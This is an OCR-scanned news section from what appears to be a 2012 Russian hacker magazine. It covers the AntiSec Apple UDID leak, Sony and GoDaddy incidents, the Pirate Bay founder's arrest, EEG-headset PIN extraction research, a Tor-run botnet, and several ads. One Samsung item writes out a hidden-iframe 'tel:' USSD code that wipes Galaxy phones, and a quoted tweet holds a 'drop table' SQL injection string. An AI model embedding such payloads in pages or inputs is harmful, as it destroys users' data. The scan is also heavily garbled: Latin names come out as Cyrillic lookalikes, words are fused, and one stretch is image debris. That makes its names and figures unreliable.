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СПРАВИТЬСЯ С 0005 



Многим почему-то претит слово «кибероружие». Возможно, оной 
правда звучит слишком высокопарного нельзя отрицать очевид- 
ное: сегодня действительно существуют реальные инструменты 
для войны в Сети. Один из таких инструментов — й0о5. Много- 
тысячные ботнеты, генерирующие огромное количество трафика, 
зачастую способны завалить не только целевой ресурс, ной сете- 
вую инфраструктуру вокруг. И если раньше отфильтровать ботов 
было относительно просто, то с каждым днем атаки становятся все 
умнее и эффективнее. При этом атака не всегда идет с за раже иных 
машин — иногда зловредный трафик сознательно генерируют 
огромное количество людей (что используется Апопутоиз). А в 
некоторых случаях «отказ в обслуживании» удается выполнить 
вообще без распределенного подхода: на руку злоумышленникам 
играютсерьезные изъяны в архитектуре сайтов и фундаменталь- 
ные уязви мости в сетевых приложениях, позволяющие уронить 
сайт хоть с мобильноготелефона. Частый вопрос: что делать, 
если на сайт пришел 00о5? Можно ли защититься от напасти 
своими силами? Не всегда, но нередко это возможно. Поэтому 
совместноссоздателями Огаіог, системы фильтрации трафика, 
мы решили под гото вить для тебя понятное руководство по защите 
отй0о5-атак. Набор рецептов, которые, во-первых, помогутпро- 
диагностироватьсервер, во-вторых, устранитьдетские ошибки и, 
в-третьих, отбить некоторые из атак своими силами. Рекомендую 
прочитать в обязательном порядке: в современных реалиях к 
00о5'у должен быть готов каждый. 
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ПЕРВЫЙДЖЕЙЛБРЕЙКІОБбудалось 
осуществить хакеру Гранту Полу— в 
качестве доказательства онустановил на 
іРИопе 5 приложение Сусііа. 



АРРІ_Е И ПРИВАТНЫЕ 
ДАННЫЕ 12 МИЛЛИОНОВ 
ЧЕЛОВЕК 



«ЯБЛОЧНАЯ» КОМПАНИЯ СНОВА ВОВЛЕЧЕНА В СКАНДАЛ 

е совсем обычная утечка данных приключилась в этом 
месяце с компанией Арріе. Началось все с того, что хакеры 
из АпІіБес отчитались о новом подвиге — якобы они по- 
хитили 12 миллионов идентификационных номеров ІЮЮдля Арріе- 
устройств. Вишенкой наторте ихзаявления сталоутверждение, что 
данные были угнаны с ноутбука агента ФБР Кристофера Стэн гл а! 

Чтобы небытьголословными, хакеры опубликовали на РазІеЬіп 
миллион номеров из числа похищенных (впрочем, ФИО пострада в- 
шихлюдей, адреса ителефоны были гуманно скрыты]. Разумеется, 
у общественности сразу же возникло множество вопросов — напри- 
мер, откуда на лаптопе агента ФБР вообще взялись та кие данные? 
ФБР внесло еще большую неразбериху в эту странную ситуацию, 
когда прокомментировало случившееся, категорически заявив — 
такой информацииу Бюро никогда небыло, сбором подобныхданных 
оно не за ни мал ось. Информацию о взломе ноутбука агента ФБР 
также опровергло. Арріе, само собой, тоже не осталась в сторо- 
не — поддержав федералов, компания сообщила, что никогда не 
передавала ФБР списки ІЮЮ. Однако идентификаторы у хакеров 
действительно были. 

Когда накал страстей вокругпоисков виновниковутечки достиг 
пика, издательская компания ВІиеТоасІ призналась, что это ее вина. 
Опубликованный хакерами файл совпадал с информацией, храня- 
щейся на серверах компании, на 98%. Как имен но злоумышлен ники 
добралисьдо базы данных, пока неясно, идетрасследование. 





ВІ0Б6, кстати, ис- 
пользуется механизм 
идентификации, 
фактически означа- 
ющийотказотпри- 
вязки кІЮШ.АррІене 
устаетнапоминатьоб 
этоминазываеттех- 
нологиюидентифи- 
кационныхномеров 
устаревшей. 



50ЫУ ВЗЛОМАЛИ. ОПЯТЬ 



ЯПОНСКИЙ ГИГАНТ ВНОВЬ ПОДВЕРГСЯ АТАКЕ 







а ч 




* А 




цн# -■ 




' ч. 

1. : »\\ 

’ ■ ' ѵ. 


ч 


ч // " А. 

1 ,/■ •->, 


■ -Р 



а верняка все помнят прошлогоднюю эпопею — тогда ком- 
паниюБопу взламывали несколько раз подряд, и каждая 
атака была эпичнее предыдущей. Казалось, после этого 
5опу взялась за ум и наконец озаботилась проблемой И Б. Тем уди- 
вительнее было опять у видеть в информационных сводках новость 
о взломе Бопу. Стоит сразу сказать, что сама компания на этот раз в 
лужу не села, — по официальным данным, взломали компа ни ю-по- 
ставщика. Отличилисьхакеры из команды N иІІСгеѵѵ, опубликовав- 
шие е-таіі и логины десятков клиентов мобильного подразделения 
Бопу, а также несколько паролей, якобы принадлежащих админи- 
страторам взлома иного сервера. Хакеры утверждал и, что это лишь 
один из восьми серверов Бопу, которые находятся под их контролем. 

Официальный ответ Бопу был таков: в руки киберпреступников 
попала информация лишь о 400 клиентах из Китая и Тайваня, а 
серверы вообще незатронуты. Также подчеркивалось, что взломали 
некоего партнера компании, но не саму Бопу. Доподлинно узнать, кто 
говоритправду, не представляется возможным, но, похоже, хакеры 
попросту решили преувеличить содеянное. 

Кстати, в США тем временем арестовали второго хакера из 
ЫгБесигіІу — Рейнальдо Риверу, подозреваемого в причастности 
кпрошлогодним атакам наБопу. 




4- ■ «г * 
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ВЫШЛАФИНАЛЬНАЯ 
ВЕРСИЯ ѴШООѴѴББЕКѴЕК 
2012, со 100%-й интеграцией 
РоѵѵегБЬеІІ и пользователь- 
ским интерфейсом Меіго, 
пришедшим на замену при- 
вычному меню «Пуск». 




ОБЛАЧНОЕХРАНИЛИЩЕ 
«ЯНДЕКС. ДИСК» ТЕПЕРЬ 
РАБОТАЕТ БЕЗ ИНВАЙТОВ — 

регистрация открыта, а ли- 
мит пространства увеличен 
до 20 Гб на каждого юзера. 



#іса 



ЗАПРОШЕДШИЙ ГОДАУДИ- 
ТОРИЯ ІСО СОКРАТИЛАСЬ НА 
ТРЕТЬ, с 30,8 миллиона юзе- 
ров до 20,5 миллиона. Впро- 
чем, МаіІ.Ви бгоируверяет, 
что это результат борьбы с 
ботами и спамерами. 




ЗАВЕРШИЛСЯ ІШ55ІАН СООЕ 
СІІР2012, в котором приняли 
участие более 3000 русско- 
язычных прогеров со всего 
мира. Победитель Влади- 
слав Епифанов получил 
ЮОООдолларов. 




РАСЕВООК РАБОТАЕТ НАД 
СОЗДАНИЕМ СОБСТВЕННОЙ 
ПОИСКОВОЙ СИСТЕМЫ. 

Эту информацию (без под- 
робностей) подтвердил 
лично Марк Цукерберг 
наТесИСгипсИОізгирІ. 
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НЕ ЭКОНОМЬТЕ НА ПРИНТЕРЕ, ЭКОНОМЬТЕ 
НА РАСХОДНЫХ МАТЕРИАЛАХ. 

КѴОСЕКА. НАДЕЖНОСТЬ, КОТОРАЯ ОКУПАЕТСЯ. 




Как и все МФУ компании КѴОСЕКА, модель Р5-1135МРР обладает не 
только исключительной надежностью, но и необычайно низкой 
общей стоимостью владения. Зачем экономить один раз, если можно 
экономить с каждой страницей? 

Экономьте с каждой распечатанной страницей: 

► Высокая скорость при низкой себестоимости печати - до 35 страниц формата А4 в минуту 

► Низкие затраты на тонер благодаря технологии ЕС05Ѵ5 

► Автоматический режим отключения, сокращающий энергопотребление 

КѴОСЕКА. ВЫ МОЖЕТЕ НА НАС ПОЛОЖИТЬСЯ. 




КИОСЕРА Документ Солюшенз Рус - Телефон +7 (495) 741 00 04 - ѵѵѵѵѵѵ.куосегасіоситепгзоіиіііопз.ги 

Корпорация КѴОСЕКА Роситепі 5оІи(іоп$ - ѵ\млмл^куосегасІоситеп(50Іи(іоп$.сот 



3 куосЕРа 

Ооситепі: 5оІи1:іоп$ 




МЕ6АЫЕѴѴ5 КЕМБРИДЖСКИЙ УНИВЕРСИТЕТ ВЫПУСТИЛ БЕСПЛАТНЫЙ ОНЛАЙН-КУРС, посвященный созданию ОС для ВазрЬеггуРі: із.дсІ/КдРѴѴЬ. 



ОДНОГО ИЗ СОЗДАТЕЛЕЙ 
ТНЕ РІ Р АТЕ ВАУ НАСТИГЛО 
ПРАВОСУДИЕ 



СУДЕБНЫЙ ПРОЦЕСС ОТГРЕМЕЛ НЕСКОЛЬКО ЛЕТ НАЗАД, НО ЕГО 
ОТГОЛОСКИ СЛЫШНЫ ДО СИХ ПОР 




Хотячетверосоз- 

дателейтрекера 

давноотошлиот 

дел # борьбасТРВ 

продолжается: 

недавнобоодіе 

подвергла цензуре 

домены Бухты. 

Теперьонине 

отображаются при 

автодополнении 

поисковыхза- 

просов. 



ще в далеком 2009 году основатели «Пиратской бухты» были при- 
говорены кгодутюрьмы каждый и к суммарному штрафу вЗО миллио- 
нов шведских крон (примерно 4,3 миллиона долларов). Тогда один из 
четверки, Готфрид Свартхольм, отсутствовал на заседании суда по состоянию 
здоровья, таккакбыл госпитализирован водну избольницКамбоджи. Не 
явился Свартхольм и на последующую апелляцию, в результате чего при говор 
остался в силе, а самого Готфрида объявили в международный розыск. По идее, 
в Камбодже, где он и остался, опасаться ему было практически нечего — между 
Швецией и Камбоджой даже нет договоренности о выдаче преступников. 
Подозреваем, что Свартхольм сильноудивился, когда егоспустя годы всеже 
арестовали прямо втой самой Камбодже. 

Не будем ходить вокруг да около и поясним — оказалось, что арест никак 
не связан со скандальным трекером, хотя история все равно скверная. Хакера 
быстро итиходепортировали из Камбоджей — все представилитак, будтоу 
него истекла виза, раз экстрадировать как преступника его было нельзя. Хотя 
Свартхольмудолжны были предложитьвыбор и он сам волен был решать, куда 
ему отправиться из страны, его депортировали именно в Швецию. Во время 
всей этой неразберихи ему даже не удалось пообщаться с адвокатом. Ка к толь- 
ко самолете «беглым преступником» приземлился в стокгольмском аэропорту, 
власти предъявили Свартхольму новое обвинение — во взломе ИТ- компании 
І_одіса. Из-за атаки на эту контору в 201 0 году в открытом доступе оказались 
свыше 9000 номеров шведских налогоплательщиков. Сейчас Свартхольм от- 
рицаетвееобвинения и ожидает суда. 




НЕЙРОИНТЕРФЕЙСЫ 
СКРЫТАЯ УГРОЗА 



ТЕХНОЛОГИЯ ЕЩЕ НАХОДИТСЯ В ЗАЧАТОЧНОМ 
СОСТОЯНИИ, Н0УЖЕПРИЗНАНА0ПАСН0Й 

ейрокомпьютерные интерфейсы досихпорпри- 
надлежатскорее ксфере научной фантастики, 
нежели к реальности. Да, первые разработчики 
и даже готовые продукты в этой области уже существуют, 
но стоит признать — технология пока очень далека от со- 
вершенства. Однако это не помешало объединенной группе 
ученыхиз Оксфордского, Женевскогои Калифорнийского 
университетов провести любопытное исследование и 
прийти к выводу, что нейроинтерфейсы будут довольно пер- 
спективнойдляхакеров штукой. Исследователи провели 
испытания, используя популярный девайс ЕРОС производ- 
ства компании ЕтоІіѵЗузІет, которая специализируется 
на создании нейрокомпьютерныхинтерфейсов на основе 
электроэнцефалографии. По сути, ЕРОС — это именно ком- 
пактный электроэнцефал ограф стоимостью 299 долларов. 
Похожий девайс выпускаеттакже компания ЫеигоЗку, 
называется он МіпсІѴѴаѵе, и онтоже поучаствовал в экс- 
перименте. Кслову, оба прибора похожи на своеобразную 
помесь ободка с гарнитурой, дополненную датчикам и. И оба 
прибора уже успели завоевать немалую популярность. 

Итак, что сделали ученые? Они продемонстрировали, 
чтотеоретически подобныеустройства могутиспользо- 
ватьсядля несанкционированного извлечения информа- 
ции. Очень хочется добавить «прямо из мозга», но это было 
бы несовсем верно:). Входеэкспериментов исследователи 
просил и добровольцев задумать любое четырехзначное 
число, а затем демонстрировали им на экране последо- 
вательность цифр от 0 до 9 для каждого из знаков числа, 
регистрируя при этом работу мозга с помощью ЕРОС. 

Каждая цифра повторялась 16 раз, всего показ «слай- 
дов» за ни мал 90 секунд. Мозговые волны добровольцев 
внимательно изучались на предмет подозрительных пиков, 
которые могли бы их выдать. Таким образом ученым удал ось 
с первого раза у гадать задуманный испытуемыми РІЫ-код 
в 20% случаев. Аналогичный результат был достигнут в 
угадывании названия обслуживающего испытуемых банка 
и имен их знакомых. Дальше еще интереснее — правильно 
распознать заду манное место удал ось в 30% случаев, а 
месяц рождения тестируемого — в 6 0 % ! Ученые подчерки- 
вают, что и Етоііѵ, и ЫеигоЗку имеютсобственные магазины 
приложений, откуда пользователи могутскачиватьраз- 
личныеприложения оттретьихсторон. АРІ вобоихслучаях 
предоставляет неограниченный доступ непосредственно 
кэлектроэнцефалограмме мозга пользователя. Насколько 
это может быть опасно уже сейчас, не говоря о будущем, — 
вопросоткрытый. Исследователи полагают, что начинать 
создавать защиту нужно немедленно, таккакспайварьдля 
нейроинтерфейсов можно реализоватьуже сегодня, а через 
5-10летситуация и вовсестанеткритической. 




СТИВВ03НЯК0СУДЕБН0М ПРОЦЕССЕ АРРІ.ЕѴ5 5АМ51Ж6: 



«РЕШЕНИЕ СУДА МНЕ НЕНАВИСТНО, Я НЕ СОГЛАСЕН 
С НИМ — ТАКИЕ МЕЛОЧИ ДАЖЕ НЕЛЬЗЯ НАЗВАТЬ 
ИННОВАЦИЯМИ И ПАТЕНТОВАТЬ» 
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реклама специальные условия: скидка три процента 



Более 1 4 000 руководителей 
прошли «Директорский курс» 
бизнес-школы «Самолов и Самолова» 




Алексей Дегтярев — гендиректор В2В-Сеп1ег с 2005 года. 
Под его руководством компания увеличила выручку более 
чем в 5 раз. В 2010 году прошел «Директорский курс» в 
бизнес-школе «Самолов и Самолова». 

Формула «Я начальник , ты дурак» ошибочна. Руково- 
дить нужно с помощью вопросов и рекомендаций, а не 
с помощью ответов. 

Трудоголизм — это болезнь, замещение остальных 
сфер жизни одной, где все получается. Но первый же 
барьер может сбить такого человека полностью. 

Точки мотивации руководителя — имидж и самосовершен- 
ствование. И еще, мне кажется, психологическое 
удобство. Оно является тормозом для циничных решений. 

С людьми работать приятнее, чем с «персоналом». 



Где учатся топ-менеджеры? 

«Директорский курс» — это программа для директоров и 
собственников, которые хотят учиться в группе равных 
себе. С 2004 года он проходит в открытом формате, чтобы 
принять участие в нем смогли все желающие. 

Курс настолько практичен, что ряд ведущих компаний 
используют его в качестве основы для своих корпоративных 
университетов. Самый крупный проект был реализован в 
компании, обучившей по программе курса более 3 000 
руководителей. 

Людей, прошедших курс, объединяют общий язык и единый 
взгляд на управление. 



«Директорский курс» я проходил болезненно. Он для всех 
проходит болезненно. Но открывает глаза на собствен- 
ные недоработки, слабые стороны. Показывает, как, куда 
и что менять. Это серьезный инструмент. 

Было ощущение, что курс идет спонтанно. Случайно 
увидел у тренера план занятий. Все поминутно расписано. 
Не бывает спонтанно такой эффективной работы. 

Мне приятно соотносить себя с брендом бизнес-школы 
«Самолов и Самолова». Он дает чувство сопричастности 
к большому делу, к хорошему «племени». 



Вы можете принять участие в «Директорском курсе» в 
любом из четырех городов: Москве, Санкт-Петербурге, 
Новосибирске или Красноярске. 

Обратитесь в бизнес-школу «Самолов и Самолова», и мы 
предложим вам удобный график обучения и группу 
участников, равных вам по уровню. 



Для читателей «Хакер» специальные условия. 



Самолов и Самолова 



(495) 660-01-05 Москва 

(812) 313-40-50 Санкт-Петербург 

(383) 335-77-99 Новосибирск 
(391) 277-66-11 Красноярск 
\л/\л/\л/.5атоІоѵ.ги іпію@5атоІоѵ.ги 





МЕ6АЫЕѴѴ5 ХАКЕРОВ, ВЗЛОМАВШИХВ2011 ГОДУ сеть кафеБиЬѵѵау и нанесших компании ущерб 10 миллионов долларов, осудили на 7 лети 21 месяцтюрьмы. 



ОБНАРУЖЕН Р2Р-БОТНЕТ, 
УПРАВЛЯЕМЫЙ ЧЕРЕЗ ТОР 



САМЫЕ ПИРАТСКИЕ 
ПИРАТЫ 



НОВЫЙ, ЗАКОНОМЕРНЫЙ ИТОГЭВОЛЮЦИИ БОТНЕТОВ 




етомтекущего года на гесИіІ состоялось свое- 
образное интервью — публика зада вала вопросы 
анонимному владельцу ботнета, а тот отвечал и 
рассказывал, как работает вся эта «кухня». В ходе сессии 
вопросов-ответов выяснилось, что в основе зомби-сети 
лежитутекший исходный код2еи5, к которомудобавлены 
некоторыефичи, руткит, модули ІРС, 0йо5 и майнинга бит- 
кои нов. Кроме того, хозяин ботнета поведал, что трафику 
него идет через Тог, а сделано это затем, чтобы исключить 
обнаружение. Боты якобы также работают как релей Тог. 

И воттеперь, несколько месяцев спустя, компания 
С йаіа Зесигііу І_аЬз обнаружила очень похожую действу- 
ющуюзомби-сеть. Ботнетработаетпообычной Р2Р-схеме, 
если бы неодно«но» — коммуникации между ботами осу- 
ществляются внутри сети Тог, то есть боты действительно 
работают как релей, что и было описано на гесИіС В отчете 
0 ОаІаЗесигіІу І_аЬз говорится, что за анонимайзером 
такжескрыти ІРС-сервер, подающий ботнету команды. 
Изящное решение, ведь хозяева ботнета убивают таким 
образом сразу нескольких зайцев: усложняют перехват 
управления сетью, блокировку трафика и прячут сервер. 
Фактически им даже не нужно разрабатывать новый 
зашифрованный протокол, достаточно обычного ІРС, 
который идетчерезТог. 





ЮОООмашинна- 
считывал ботнет, 
упомянутый на 
гесісііі, и каждый 
деньонприбавлял 
побОО-ЮООновых 
инсталлов. Скром- 
ная цифра, коопера- 
тор не скрывает, что 
емухватаетлишь 
на карманные рас- 
ходы:егоосновной 
доход— генерация 
Віісоіп, приносящая 
околобОдолларов 
вдень. 



ОПУБЛИКОВАНЫ РЕЙТИНГИ ЗЛ0СТНЫХСИДЕР0В 
ИРЕЛИЗЕРОВ 



нтересную статистику опубликовала группа уче- 
ных изуниверситета Карлоса III, института ІМйЕА 
Ыеіѵѵогкви ряда другихучебныхзаведений. Ис- 
следователи внимательно изучили базутрекераТЬеРігаІе 
Вау и выявили, какие пользователи (или релиз-группы) 
раздают больше всего торрентов, с каких ІР-адресов они это 
делают и где могут находиться географически, исходя из 
этихданных. Воттаквыглядиттоп-Юза последний месяц: 



Место 


Ник 


Количество 

торрентов 


Использова- 

НОІР 


1 


ТѵТеат 


3808 


924 


2 


зсепеЬаІапсе 


2359 


795 


3 


ХхХРВ 


1225 


63 


4 


всепеііпе 


993 


244 


5 


сІідИ:аІ_гіррег 


870 


38 



Не менее любопытную статистику опубликовала ком- 
пания I СМ, занятая защитой лицензированного контента 
по заказам российских правообладателей. Самыми по- 
пулярными в России пиратскими сайтами согласно отчету 
ІСМ являются: 



Сайт 


тИЩтемати- 
ческий индекс 
цитирования 
Яндекс) 


боодіе 

РадеКапк 


Позиция сайта 
нааіеха.сот 


гиігаскег.огд 


4500 


6 


281 


ШІе.ги 


1100 


4 


2551 


гиіог.огд 


950 


6 


1296 


кіпогаі.іѵ 


900 


5 


2240 


ту-ЫБги 


850 


4 


1262 



«Лучшими» релизерами Рунета (сайты, первыми 
публикующие пиратские копии, откуда они расходят- 
ся дальше по интернету) являются такие сайты, как 
ипіопдапд.іѵ (с большим отрывом), геіігіаб.огд и гиіог.огд. 
В пятеркулидеровтакже входят сайткікіеат.пеі и соци- 
альная сеть«ВКонтакте». 




КОМПАНИЯ НЕѴѴІ.ЕТТ-РАСКАКО 

выпустила бета-версию ОрепѵѵеЬОБ 
подлицензиейАрасЬе2.0, каки обе- 
щала ранее. Напомним, что решение 
сделать ѵѵеЬОБ открытой далось 
компании нелегкой былопринято 
только после смены руководства. 

На этом фоне интересно выглядит 
недавнеезаявление новой главы НР 
МегУитмен, которая сообщила, что 
компания намерена вернуться квы- 
пуску смартфонов. 




«ЯНДЕКС»запустил 
программу поиска дыр в 
мобильных приложениях. 
За каждый багкомпания 
готова платить от ЗдоЗО 
тысяч рублей взависимости 
отуровня бага. 




Б0ТНЕТ2ЕК0АССЕ55 
РАЗРОССЯ до 1 миллиона 
активных ботов, сообщает 
БорИоз. На кликфроде и май- 
нингебиткоинов владельцы 
сети могутзарабатывать 
доЮООООдоллароввдень. 
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Программа «Путешествуй в стиле Три К» проводится с 1 ноября 2012 года по 31 января 2013 года включительно на территории РФ только для граждан 
РФ, достигших возраста 18 лет. Информация об организаторе программы, о правилах проведения, количестве призов по результатам ее проведения 
сроках, месте и порядке их получения на интернет-сайте ѵѵѵѵѵѵ.Іизоѵка.ги. Реклама. 









МЕ6АЫЕѴѴ5 



ЧЕТЫРЕХМИЛЛИОННОЕ ДОМЕННОЕ ИМЯ бы л о зарегистрировано в зоне. КІІ 17 сентября 2012 года. 



ЯБЛОЧНЫЕ ИЗВЕСТИЯ 



КОМПАНИЯ АРРІ.Е ПРЕДСТАВИЛА 
НОВЫЙ ІРНОЫЕ И НЕ ТОЛЬКО 

сентябре компания Арріе провела презентацию, столь ожи- 
даемую поклонниками бренда по всему миру. Затаив дыха- 
ние, все ждал и новый іРЬопе, ион пришел. Тебе уже навер- 
няка известен список основных отличий нового смартфона от версии 
45 и более ранних (тем более что никаких сверхинноваций аппарат 
не принес), однако позволь напомнить о ключевых моментах. Теперь 
устройствоосновывается на новой однокристальной системе А6, ко- 
торая почти в два раза производительнее своей предшественницы. 
Устройствостало на 18%тоньше (толщина — 7,6 мм) и на 20%легче 
(масса — 112 граммов), чем іРЬопе45. И это не помешало іРЬопе 5 
получить четырехдюймовый дисплей разрешением 11 36x640 точек. 
іРЬопе 5 также получил улучшенную камеру разрешением 8 Мп. Она 
оснащается датчиком стехнологией обратной засветки и объекти- 
вом с максимальной диафрагмой Р/2,4. Камера позволяет записы- 
вать видео РиМ НО, поддержи ваеттехнологию распознавания лиц и 
наделена режимом съемки панорам. 

Еще одним нововведением стал 8-контактный разъем ЫдЫпіпд 
(на 80% меньшетого, что использовался в предыдущих поколениях 
іРЬопе). Пожалуй, именно он и вызвал больше всего споров и на- 
реканий. Дело в том, что многие вообще ожидал и увидеть в новом 
устройстве технологии беспроводной зарядки, а вместо них публике 
подсунули новый разъем питания, который, ко всему прочему, не 
совместим с прежним, а значит и практически со всей «старой» 
периферией. Стоит добавить, что Арріе продает адаптер на 30 ріпза 
29 долларов штука, а адаптер І_ідЫпіпд-ІІ5В стоит 19 долларов. Не- 
удивительно, что недовольство в комьюнити быстро достиглотаких 
масштабов, что представители Арріе были вынуждены дать коммен- 
тарий, пояснив, что без ЫдЫпіпд новые іРЬопе и іРосІ не удалось бы 
сделать та кими тон кими. То есть удобство пользователей принесли 
в жертву миниатюризации, никого особенно и не спрашивая. 

Многих поклонников Арріе также удивило и расстроило отсут- 
ствие технологии ІМРС в іРЬопе 5. Технология действительно очень 
активно внедряется в мобильнуютехнику, позволяя использовать 
гаджеты в качествеэлектронного кошелька для бесконтактных 
платежей, в качестве электронных пропусков и такдалее. Однако 
старший вице-президент Арріе Филипп Шиллер заявил, что ІМРС 
вряд л и способна решить какую-либо из текущих проблем пользо- 
вателей, к тому же для скидочных карт и электронных билетов есть 
приложение РаззЬоок, которое «ничуть не хуже». 

Хотя из вышеописанногоскладывается ощущение, что многие 
ожидали от іРЬопе 5 большего, на деле у Арріе все идет прекрасно. 
Предварительные продажи іРЬопе 5 прошли с рекордным успехом, 
что отразилось и на стоимости акций компании. Цена одной акции 
Арріе впервые за всю историю превысила 700 долларов. 
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За первые сутки было 
сделаноболеедвух 
миллионов предва- 
рительныхзаказов 
наАррІеіРЬопе5,что 
превышает прошлый 
рекорд, установлен- 
ный іРИопе 45, более 
чем в два раза (тому 
удалось взять рубеж 
лишьвмиллион 
предварительных 
заказов). 



В завершение стоит отметить, что помимо іРЬопе 5 корпорация 
Арріе презентовала также обновленные плееры ІРосІ, наушники 
ЕагРосІз, над которыми работа в стане компании кипела более трех 
лет, и финальную версию І056, бесплатный переход на которуюуже 
начался. 



ВИЦЕ-ПРЕЗИДЕНТ ПО КИБЕРБЕЗОПАСНОСТИ ТКЕ№ МІСКО СЧИТАЕТ: 



«ПРОГРАММЫ ВОСТОЧНО- 
ЕВРОПЕЙСКИХ ХАКЕРОВ 
СДЕЛАНЫ ТАК ЭЛЕГАНТНО, 
ЧТО ИХ МОЖНО СРАВНИТЬ 
С ЯЙЦАМИ ФАБЕРЖЕ ОТ 
МИРАМАЛВАРИ» 
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ІАІ 


ПЭдагеМіГіеуез 

35 рго совет: используй Еггог(). 
зіаск вместо Ігу саІсЬ. 





(ВсЛНсМіеІсі 

Подождите, что? Оиаіуз 
ВгоѵѵзегСЬеск для СЬготе на 
ѴѴіпсІоѵѵз имеет базовый адрес 
0x10000000? #йЕРР #РАІІ_ #А5І_Р 

сот/ІМиРѵбІРО 

Н Комментарий: 

Вот так софт, который должен прове- 
рять защищенность, по факту делает систе- 
му более уязвимой 8) 



Комментарий: 

Не фанат рэпа, но шутку поддержи- 
ваю :] 



ГЭпоаИрИех 

Если твой аккаунт для твиттера в 
большинстве своем «ретвитит», 
то он бесполезен. 




ПНсНаІсоп 

Вы отвечали когда-нибудь на 
5М5-опрос 501-инъекцией? 
1) Да. 2) Нет. 3); сігор ІаЫе 



апзѵѵегз;— 
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МЕ6АЫЕѴѴ5 6006І.Е ОТКАЗАЛАСЬ ОТ ПОДДЕРЖКИ ІЕ 8 В 6006І_ЕАРР5, сочтя устаревшим один из самых популярных браузеров по версии БіаіСоипІег. 



СТРОКА КОДАСПОСОБНА 
ОБНУЛИТЬ 6АБАХѴ 

НАЙДЕНА ОПАСНАЯ ДЫРКА В СМАРТФОНАХ ЗАМБІИ 



СЕРЬЕЗНЫЙ СБОЙ 
РЕГИСТРАТОРА 
60 ОАРОУ 



акерская конференция Екораііу — ивент не слишком известный, 
однако это название был о у всех на слуху, после того какресерчер 
Рави Боргаонкар из Берлинского техническогоуниверситета проде- 
монстрировал на Екорагіу уязв имость флагманов 5а тзипд. Хакер обнаружил 
и показал довольно простую вещь: дырку в ПО Батзипд ТоисЬѴѴіг, которое 
установлено, в числе прочего, и на смартфонах 0а Іаху 5 II и 5 III. 

Дело в том, что даже та кая важная операция, как удаление пользователь- 
ской информации (возвраткзаводским настройкам) в этихаппаратах реализо- 
вана через 11550-запрос, состоящий из символов «звездочка» (*), «решетка» 
(#) и цифр. Ктомужеаппараты автоматически обрабатываютссылки на номе- 
ра, которые начинаются с «1еЬ>. Выходит, что для эксплуатации бага хакерам 
достаточно скрыть какой-либо 11550 -запрос в коде сайта, передать его на 
аппарат через канал І\ІРС или зашифровать его в (ЭР- коде. Достаточно вообще 
внедрить в НТМБ-страницу фрейм вида<ітате5гс= , ЧеІ:*2767*3855# ,, />с 11550- 
запросом *2767*3855#, и черное дело сделано — смартфон будет«очищен». 

Конечно, у да иной уязви мости есть и другие неприятные возможности при- 
менения -к примеру, можно совершать звонки на платные номера. Проверить 
свой аппарат на наличие этой дырки можно по адресу ЬидеІазег.сот/ас/иззсІ- 
1е5І.рЬр?сопЫгие . Если ты увидишь свой ІМЕІ- номер, значит твой смартфон, 
увы, в числе уязвимых. 




Между тем продажи БатзипдбаІахуБ ІІІуже перешагнул и рубеж в 20 миллионов устройств, 
что делаетБ III самым успешным смартфоном отБатзипд за всю историю. 



ХАКЕРЫ ПОПЫТАЛИСЬ ПРЕДСТАВИТЬ 
ТЕХНИЧЕСКИЕ НЕПОЛАДКИ КАК ВЗЛОМ 




лительный сбой пережил в середине сентября 
крупнейший в мире регистратор 0о Баббу, под 
контролем которого находятся более 50 миллио- 
нов доменов. Из-за неполадоквофлайнушли миллионы 
сайтов,таккакБІ\І5-серверы СІ\І51.5ЕСІІРЕ5ЕРѴЕР.І\ІЕТ, 
СІ\І52.5ЕСІІРЕ5ЕРѴЕР.І\ІЕТ и СІ\І53.5ЕСІІРЕ5ЕРѴЕР.І\ІЕТ 
перестали функционировать. 

Оперативно устранить проблему не вышло — потратив 
четыре с лишним часа на тщетные попытки реанимации, 
компания перевела всех клиентов на серверы Ѵегізідп, 
и только после этого сайты вернулись в строй. Тем време- 
нем в твиттере появилось сообщение отхакера Апопутоив 
ОѵѵпЗг, принявшегоответственностьза взлом на себя. 

Хакер объяснил свой поступок просто — мол, он хотел 
проверить, какработаетсистемазащиты сайта откибер- 
атак, и якобы имел причины, о которых говорить пока не 
может. Но на лавраххакер почивал недолго — через сутки 
компания 0о Баббу опубликовала официальное объясне- 
ние случившегося. Стало ясно, что здесь, каки в случае с 
АпІі5ес, якобы взломавшими ноутбукагента ФБР, хакер 
выдал желаемое за действительное. 

0о Баббу сообщила, что причиной сбоя послужила не 
хакерская атака и не вмешательство извне, а банальная 
ошибка втаблицахмаршрутизации. 





ЫѴЮІАПОКИНУЛ ГЛАВАМО- 
БИЛЬНОГО ПОДРАЗДЕЛЕНИЯ 

МайкРэйфилд, отвечавший 
за чипсеты Тедга— свое- 
образный Іпіеі мира АВМ- 
процессоров. 



ПОСТАВКИ ПАМЯТИ йКАМ 
ДЛЯ ПКВПЕРВЫЕОПУСТИ- 
ЛИСЬ НИЖЕ ОТМЕТКИ 50% и 

составили 49%, сообщает I НБ 
іБиррІі. Смартфоны и планше- 
ты отвоевали немалую долю 
рынка. 



МІСЯ050РТ МОЖЕТ ПРАЗД- 
НОВАТЬ— ѴѴіпбоѵѵз 7 стала 
самой распространенной ОС в 
мире (42,76%), поданным ІЧеІ 
Арріісаііопз. Для сравнения: 
Мае ОБХ досталось 7,13%. 



39% СОТРУДНИКОВ ит- 
ОТДЕЛОВ ИМЕЮТ ДОСТУП 
К КОНФИДЕНЦИАЛЬНЫМ 
ФАЙЛАМ, к которым доступа 
у нихбытьне должно. Каж- 
дый пятыйуже пользовался 
этой возможностью. 



ІИТЕІ. СООБЩАЕТ, ЧТО 
НАЧАТО ПРОИЗВОДСТВО 
ЧИПОВ ІИТЕІ.ѴШЕІЕБ5 
СНАК6ІЫ6 ТЕСНИ0Ю6Ѵ. С их 
помощью реализуютбеспро- 
водную передачу энергии с 
одного устройства на другое. 
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ОГРАНИЧЕНИЕ МІСК050РТЮ теперь распространяется и на Ноітаіітоже — нельзя установить пароль длиннее 16 символов. 



МНОГОЛИ РЕКЛАМЫ 
В 6006БЕ? 



НОВОЕСЛОВО 
В ЗАЩИТЕ БАНКОМАТОВ 



ЖУТКОВАТЫЙ РЕЗУЛЬТАТ ПРОСТОГО ИССЛЕДОВАНИЯ 

абавное и грустное одновременно исследование провел блогер 
Алекс Юмашев ( ЫодЩЬіІ.сот ), и повторить его опытлегко сможет 
каждый. Для эксперимента будет достаточно выключить АсІЫоск 
(или другие подобные решения) и просто зайти в боодіе. Оказывается, ре- 
клама на странице результатов поиска не просто присутствует, нозанимает 
